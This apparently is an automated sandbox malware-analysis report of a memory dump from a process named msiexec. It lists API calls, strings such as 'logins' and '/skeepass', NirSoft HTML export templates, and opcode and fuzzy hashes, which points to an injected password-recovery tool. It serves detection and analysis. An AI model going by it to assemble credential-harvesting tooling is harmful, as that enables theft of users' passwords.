                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                          • String ID:
                                                                                          • API String ID: 1043902810-0
                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                          • API String ID: 2899246560-1542517562
                                                                                          • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                          • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                          • API String ID: 3330709923-517860148
                                                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                          APIs
                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                          • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                          • String ID: logins$null
                                                                                          • API String ID: 2148543256-2163367763
                                                                                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                          APIs
                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                          • memset.MSVCRT ref: 00408606
                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                          • String ID: ---
                                                                                          • API String ID: 3437578500-2854292027
                                                                                          • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                          • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                          • memset.MSVCRT ref: 00410892
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                          • String ID:
                                                                                          • API String ID: 1010922700-0
                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                          APIs
                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                          • free.MSVCRT ref: 004186C7
                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                          • free.MSVCRT ref: 004186E0
                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                          • free.MSVCRT ref: 00418716
                                                                                          • free.MSVCRT ref: 0041872A
                                                                                          • free.MSVCRT ref: 00418749
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                          • String ID: |A
                                                                                          • API String ID: 3356672799-1717621600
                                                                                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp
                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                          • API String ID: 2081463915-1959339147
                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                          APIs
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                          • API String ID: 2012295524-70141382
                                                                                          • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                          • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                          • API String ID: 667068680-3953557276
                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 1700100422-0
                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                          • String ID:
                                                                                          • API String ID: 552707033-0
                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_snwprintf
                                                                                          • String ID: %%0.%df
                                                                                          • API String ID: 3473751417-763548558
                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                          APIs
                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                          • String ID: A
                                                                                          • API String ID: 2892645895-3554254475
                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                          APIs
                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                          • String ID: caption
                                                                                          • API String ID: 973020956-4135340389
                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                          APIs
                                                                                          Strings
                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                          • API String ID: 1283228442-2366825230
